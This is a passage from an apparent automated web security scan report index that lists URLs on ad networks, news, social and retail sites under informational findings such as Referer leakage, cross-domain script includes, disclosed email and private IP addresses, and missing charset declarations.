12.36. http://r1-ads.ace.advertising.com/site=789981/size=728090/u=2/bnum=73612408/hr=13/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.imdb.com%252Fimages%252FSF99c7f777fc74f1d954417f99b985a4af%252Fa%252Fifb%252Fdoubleclick%252Fexpand.html

12.37. http://sales.liveperson.net/hc/76226072/

12.38. http://segment-pixel.invitemedia.com/set_partner_uid

12.39. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.40. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.41. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.42. http://showadsak.pubmatic.com/AdServer/AdServerServlet

12.43. http://sync.mathtag.com/sync/img

12.44. http://t.mookie1.com/t/v1/imp

12.45. http://tags.bluekai.com/site/2736

12.46. http://tags.bluekai.com/site/2751

12.47. http://user.lucidmedia.com/clicksense/user

12.48. http://www.ask.com/about/help

12.49. http://www.ask.com/about/help/webmasters

12.50. http://www.ask.com/about/legal/ask-site-policies

12.51. http://www.ask.com/about/legal/privacy

12.52. http://www.ask.com/news

12.53. http://www.ask.com/pictures

12.54. http://www.ask.com/products/display

12.55. http://www.ask.com/settings

12.56. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_helpcenter

12.57. http://www.ask.com/staticcontent/about/helpcenter/about_helpcenter_webmaster

12.58. http://www.ask.com/staticcontent/about/legal/about_legal_notices

12.59. http://www.ask.com/web

12.60. http://www.att.com/homepage/sitemap/

12.61. http://www.bizographics.com/collect/

12.62. http://www.facebook.com/ConanTheBarbarian

12.63. http://www.facebook.com/home.php

12.64. http://www.facebook.com/home.php

12.65. http://www.facebook.com/login.php

12.66. http://www.facebook.com/media/set/

12.67. http://www.facebook.com/profile.php

12.68. http://www.flickr.com/flanal_event.gne

12.69. http://www.imdb.com/

12.70. http://www.imdb.com/tv/widget/grid

12.71. http://www.wireless.att.com//store_maintenance/images/att_logo.gif

12.72. http://www.wireless.att.com//store_maintenance/images/globemaintenance.gif

12.73. http://www.wireless.att.com//store_maintenance/images/page_midSlice.gif

12.74. http://www.wireless.att.com//store_maintenance/images/page_topSlice.gif

12.75. http://www.wireless.att.com/cell-phone-service/legal/return-policy.jsp

12.76. http://www.wireless.att.com/cell-phone-service/packages/N

12.77. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

12.78. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

12.79. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

12.80. http://www.wireless.att.com/global/MEDIA_CustomProductCatalog/Samsung_Strive_blk_Pkg_s

12.81. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

12.82. http://www.wireless.att.com/store_maintenance/images/page_btmSlice.gif

12.83. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

12.84. http://wzus1.ask.com/i/i.gif

13. Cross-domain Referer leakage

13.1. http://a2.mediagra.com/b.php

13.2. http://a5.mediagra.com/b.php

13.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7

13.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

13.5. http://ad.doubleclick.net/adj/imdb2.consumer.main/showtimes

13.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/1313433976**

13.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1715.0.iframe.150x50/bWtApfW,bhesAludozcnj

13.8. http://ads.tw.adsonar.com/adserving/getAds.jsp

13.9. http://afe.specificclick.net/serve/v=5

13.10. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

13.11. http://banners.bookofsex.com/go/page/iframe_cm_26400

13.12. http://banners.bookofsex.com/go/page/iframe_cm_26400

13.13. http://bp.specificclick.net/

13.14. http://bpx.a9.com/ads/getad

13.15. http://ca.rtb.prod2.invitemedia.com/build_creative

13.16. http://ca.rtb.prod2.invitemedia.com/build_creative

13.17. http://choices.truste.com/ca

13.18. http://cm.g.doubleclick.net/pixel

13.19. http://cm.g.doubleclick.net/pixel

13.20. http://cm.g.doubleclick.net/pixel

13.21. http://creativeby1.unicast.com/assets/A250/N27522/M14414/P702/Q75332/script_300_250.js

13.22. http://googleads.g.doubleclick.net/pagead/ads

13.23. http://hire.jobvite.com/CompanyJobs/Careers.aspx

13.24. http://hire.jobvite.com/widget20.js

13.25. http://i.cdn.turner.com/cnn/.element/js/3.0/video/cvp_suppl.js

13.26. http://ifa.camads.net/dif/

13.27. http://mediacdn.disqus.com/1313183665/build/system/disqus.js

13.28. http://medleyads.com/spot/5022.html

13.29. http://medleyads.com/spot/5023.html

13.30. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

13.31. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

13.32. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

13.33. http://news.soso.com/n.q

13.34. http://platform.twitter.com/widgets/follow_button.html

13.35. http://showadsak.pubmatic.com/AdServer/AdServerServlet

13.36. http://soso.qq.com/news.q

13.37. http://soso.qq.com/news.q

13.38. http://streamate.doublepimp.com/r.poptracking

13.39. http://svcs.cnn.com/weather/getForecast

13.40. http://syndication.exoclick.com/ads-iframe-display.php

13.41. http://syndication.exoclick.com/ads-iframe-display.php

13.42. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

13.43. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

13.44. http://www.ask.com/news

13.45. http://www.ask.com/pictures

13.46. http://www.ask.com/web

13.47. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

13.48. http://www.facebook.com/ConanTheBarbarian

13.49. http://www.facebook.com/media/set/

13.50. http://www.facebook.com/plugins/like.php

13.51. http://www.facebook.com/plugins/likebox.php

13.52. http://www.facebook.com/widgets/like.php

13.53. http://www.imdb.com/tv/widget/grid

13.54. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

13.55. http://www.wireless.att.com/store_maintenance/images/globemaintenance.gif

13.56. http://www.wireless.att.com/store_maintenance/images/page_midSlice.gif

13.57. http://www.xhamstercams.com/cam/Juicy_Jules19/

13.58. http://www.zedo.com/shared/commonHeader.htm

13.59. http://wzus1.ask.com/r

13.60. http://xhamster.com/signup.php

14. Cross-domain script include

14.1. http://a2.mediagra.com/b.php

14.2. http://a5.mediagra.com/b.php

14.3. http://ad.doubleclick.net/adi/N6595.317091.MERKLEINC.COM/B5374569.7

14.4. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

14.5. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

14.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

14.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

14.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

14.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

14.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

14.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

14.12. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

14.13. http://afe.specificclick.net/serve/v=5

14.14. http://answers.ask.com/

14.15. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358

14.16. http://googleads.g.doubleclick.net/pagead/ads

14.17. http://graphics.friendfinder.com/javascript/live/ff-domLoadEvent-1284506173.js

14.18. http://hire.jobvite.com/CompanyJobs/Careers.aspx

14.19. http://hire.jobvite.com/widget20.js

14.20. http://ipr.cntv.cn/english/group/index.shtml

14.21. http://ipr.cntv.cn/english/no1/index.shtml

14.22. http://medleyads.com/spot/5022.html

14.23. http://money.cnn.com/.element/ssi/video/5.1/players/story.player.html

14.24. http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm

14.25. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

14.26. http://news.soso.com/n.q

14.27. http://pop6.com/p/memsearch.cgi

14.28. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

14.29. http://static.xhamster.com/js/statcounter.js

14.30. http://svcs.cnn.com/weather/getForecast

14.31. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

14.32. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

14.33. http://www.cnn.com/

14.34. http://www.cnn.com/.element/ssi/misc/3.0/editionvars.html

14.35. http://www.facebook.com/ConanTheBarbarian

14.36. http://www.facebook.com/login.php

14.37. http://www.facebook.com/media/set/

14.38. http://www.facebook.com/plugins/likebox.php

14.39. http://www.imdb.com/

14.40. http://www.ipraction.cn/

14.41. http://www.mediafire.com/

14.42. https://www.redhat.com/wapps/store/cart.html

14.43. http://www.tudou.com/

14.44. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp

14.45. http://www.wireless.att.com/cell-phone-service/packages/netbook-packages.jsp

14.46. http://www.wireless.att.com/cell-phone-service/packages/windows-packages.jsp

14.47. http://www.xhamstercams.com/cam/Juicy_Jules19/

14.48. http://www.zedo.com/

14.49. http://www.zedo.com/shared/commonHeader.htm

15. Email addresses disclosed

15.1. http://graphics.friendfinder.com/images/js/AjaxRequest-compact.js

15.2. http://hire.jobvite.com/CompanyJobs/careers_8.js

15.3. http://mediacdn.disqus.com/1313183665/build/system/disqus.js

15.4. http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm

15.5. http://news.google.com/

15.6. http://sp.ask.com/en/docs/a14/about/legal/privacy_policy_v1_9.html

15.7. http://tech.fortune.cnn.com/2011/08/15/is-google-buying-motorola-for-its-17000-patents/

15.8. http://w.sharethis.com/button/buttons.js

15.9. http://www.ask.com/about/help

15.10. http://www.ask.com/about/help/webmasters

15.11. http://www.ask.com/about/legal/ask-site-policies

15.12. http://www.ask.com/staticcontent/about/legal/about_legal_notices

15.13. http://www.imdb.com/showtimes/

15.14. http://www.imdb.com/showtimes/title/tt1650062/

15.15. http://www.redhat.com/j/jquery.hoverIntent.minified.js

15.16. https://www.redhat.com/j/controls.js

15.17. https://www.redhat.com/j/dragdrop.js

15.18. https://www.redhat.com/j/jquery.hoverIntent.minified.js

15.19. http://www.sohu.com/

15.20. http://www.wireless.att.com/cell-phone-service/scripts/base.js

15.21. http://www.zedo.com/

16. Private IP addresses disclosed

16.1. http://external.ak.fbcdn.net/safe_image.php

16.2. http://external.ak.fbcdn.net/safe_image.php

16.3. http://external.ak.fbcdn.net/safe_image.php

16.4. http://external.ak.fbcdn.net/safe_image.php

16.5. http://external.ak.fbcdn.net/safe_image.php

16.6. http://external.ak.fbcdn.net/safe_image.php

16.7. http://external.ak.fbcdn.net/safe_image.php

16.8. http://external.ak.fbcdn.net/safe_image.php

16.9. http://external.ak.fbcdn.net/safe_image.php

16.10. http://external.ak.fbcdn.net/safe_image.php

16.11. http://news.soso.com/n.q

16.12. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yP/r/C1LO4_1OOg0.png

16.13. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yS/r/SakaC0tDjfm.png

16.14. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yb/r/OvXYjXPaGkl.png

16.15. http://profile.ak.fbcdn.net/static-ak/rsrc.php/v1/yr/r/fwJFrO5KjAQ.png

16.16. http://pt-br.facebook.com/ajax/captcha/recaptcha_log_actions.php

16.17. http://pt-br.facebook.com/favicon.ico

16.18. http://pt-br.facebook.com/people/Andr%C3%A9-Azevedo/1668500662

16.19. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

16.20. http://static.ak.facebook.com/platform/page_proxy.php

16.21. http://static.ak.fbcdn.net/connect/xd_proxy.php

16.22. http://static.ak.fbcdn.net/connect/xd_proxy.php

16.23. http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/ARVKHdmDbiC.png

16.24. http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/_ev5gLu-ABH.css

16.25. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/0KvtPpJJZJB.js

16.26. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/79x_K5xzjuK.png

16.27. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/RHjwNbYNCek.js

16.28. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/mVJg8S3A2Rm.css

16.29. http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/yCyTimbRkBE.js

16.30. http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css

16.31. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/dBNzZ9AtCWo.js

16.32. http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/gvrW9GGxv2y.css

16.33. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/mD1E478qJLC.png

16.34. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/0k5dcVwtJQr.js

16.35. http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/LzAFHbTKrbn.js

16.36. http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/OpolsLVhFVH.js

16.37. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/WR6YXci7s1F.css

16.38. http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/foOlSPGxMgD.css

16.39. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/H9GMoKDdPbt.css

16.40. http://static.ak.fbcdn.net/rsrc.php/v1/y_/r/1xbEnWOvBF3.js

16.41. http://static.ak.fbcdn.net/rsrc.php/v1/yb/r/GsNJNwuI-UM.gif

16.42. http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/iXI7kq8F8Uu.png

16.43. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/72NZsnqjQ5t.js

16.44. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/2p1GVwLpsud.css

16.45. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/JKQSEcToESS.css

16.46. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/TK1srIkMgP5.js

16.47. http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/wQ6daFs36J_.css

16.48. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vIpx6O3T-P_.css

16.49. http://static.ak.fbcdn.net/rsrc.php/v1/yk/r/BawGDULIRtU.css

16.50. http://static.ak.fbcdn.net/rsrc.php/v1/yl/r/T1nBWlouv6j.css

16.51. http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/gjR314n9JTe.css

16.52. http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/ofNbJ9YoFJM.css

16.53. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/K1vbE3QBhxb.js

16.54. http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/z1xzUcShxUD.png

16.55. http://www.facebook.com/ConanTheBarbarian

16.56. http://www.facebook.com/ConanTheBarbarian

16.57. http://www.facebook.com/extern/login_status.php

16.58. http://www.facebook.com/extern/login_status.php

16.59. http://www.facebook.com/extern/login_status.php

16.60. http://www.facebook.com/extern/login_status.php

16.61. http://www.facebook.com/extern/login_status.php

16.62. http://www.facebook.com/extern/login_status.php

16.63. http://www.facebook.com/extern/login_status.php

16.64. http://www.facebook.com/home.php

16.65. http://www.facebook.com/home.php

16.66. http://www.facebook.com/images/loaders/indicator_black.gif

16.67. http://www.facebook.com/images/spacer.gif

16.68. http://www.facebook.com/login.php

16.69. http://www.facebook.com/media/set/

16.70. http://www.facebook.com/plugins/like.php

16.71. http://www.facebook.com/plugins/like.php

16.72. http://www.facebook.com/plugins/like.php

16.73. http://www.facebook.com/plugins/like.php

16.74. http://www.facebook.com/plugins/like.php

16.75. http://www.facebook.com/plugins/like.php

16.76. http://www.facebook.com/plugins/like.php

16.77. http://www.facebook.com/plugins/likebox.php

16.78. http://www.facebook.com/profile.php

16.79. http://www.facebook.com/widgets/like.php

16.80. http://www.facebook.com/widgets/like.php

17. Robots.txt file

17.1. http://api.recaptcha.net/challenge

17.2. http://at-img2.tdimg.com/sales/material/2011/0728/1311852230142.swf

17.3. http://at-img3.tdimg.com/sales/material/2011/0729/1311932714659.swf

17.4. http://at-img4.tdimg.com/crossdomain.xml

17.5. http://stat.tudou.com/newstat/pv

17.6. http://toolbarqueries.clients.google.com/tbproxy/af/query

17.7. http://www.xhamstercams.com/cam/Juicy_Jules19/

17.8. http://xhamster.com/signup.php

18. HTML does not specify charset

18.1. http://a2.mediagra.com/b.php

18.2. http://a5.mediagra.com/b.php

18.3. http://ad.doubleclick.net/adi/amzn.us.house.redirect/

18.4. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=120x90_bot1&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343132&domId=972525

18.5. http://ads.cnn.com/html.ng/site=cnn&cnn_pagetype=main&cnn_position=126x31_spon2&cnn_rollup=homepage&page.allowcompete=yes&params.styles=fs&transactionID=1604588547342336&tile=392593343133&domId=135492

18.6. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=61790

18.7. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_position=88x31_spon&cnn_money_rollup=homepage&cnn_money_section=fortune&cnn_money_subsection=marketgraph&params.styles=fs&domId=177939&page.allowcompete=yes&domId=177939

18.8. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=136756

18.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=article&cnn_money_position=453x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=136756

18.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434106153&page.allowcompete=yes&domId=528442

18.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=260693

18.12. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=main&cnn_money_position=336x280_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&cnn_money_subsection=homepage&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=637773

18.13. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=social_sync&cnn_money_position=475x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=480339

18.14. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=698354

18.15. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274

18.16. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=markets_and_stocks&cnn_money_section=market_news&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014106&page.allowcompete=yes&domId=644255

18.17. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x900_rgt&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=919796

18.18. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=970x418_top&cnn_money_rollup=technology&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990030&page.allowcompete=yes&domId=696470

18.19. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.20. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.21. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.22. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.23. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x23_spon5&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&tile=1313434014105

18.24. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon1&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=67962

18.25. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon2&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=726845

18.26. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon3&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=773777

18.27. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=150x50_spon4&cnn_money_rollup=markets_and_stocks&cnn_money_section=trading_center&params.styles=fs&page.allowcompete=yes&tile=1313434014105&page.allowcompete=yes&domId=78541

18.28. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=229469

18.29. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=229469

18.30. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=229469

18.31. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1313434106153&page.allowcompete=yes&domId=84066

18.32. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

18.33. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=technology&params.styles=fs&tile=1313433990029&page.allowcompete=yes&domId=411857

18.34. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

18.35. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

18.36. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1313434106153&page.allowcompete=yes&domId=383053

18.37. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon1&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=845472

18.38. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon2&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=399898

18.39. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon3&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=284939

18.40. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon4&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=812248

18.41. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon5&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=758067

18.42. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=315x40_spon6&cnn_money_rollup=business_news&cnn_money_section=sponsor_center&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=401091

18.43. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=475x60_mid&cnn_money_rollup=markets_and_stocks&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=441&qcseg=251&qcseg=233&qcseg=252&qcseg=240&qcseg=2902&qcseg=446&qcseg=292&bizo_ind=business_services&tile=1313434014105&page.allowcompete=yes&domId=113981

18.44. http://bpx.a9.com/amzn/defaultad.html

18.45. http://bpx.a9.com/amzn/iframe.html

18.46. http://ca.rtb.prod2.invitemedia.com/build_creative

18.47. http://creativeby1.unicast.com/script/V3.00/deliver2.html

18.48. http://d3.zedo.com/jsc/d3/bh.html

18.49. http://js.adsonar.com/js/pass.html

18.50. http://mediacdn.disqus.com/1313183665/build/system/def.html

18.51. http://mediacdn.disqus.com/1313183665/build/system/reply.html

18.52. http://medleyads.com/spot/1082.html

18.53. http://medleyads.com/spot/5022.html

18.54. http://medleyads.com/spot/5023.html

18.55. http://medleyads.com/spot/5232.html

18.56. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.economy.html

18.57. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.fortune.html

18.58. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.leadership.html

18.59. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.markets.html

18.60. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.money.html

18.61. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.news.html

18.62. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.pf.html

18.63. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.smallbusiness.html

18.64. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.tech.html

18.65. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.video.html

18.66. http://money.cnn.com/.element/ssi/auto/5.0/navigation/flyout.wallstreet.html

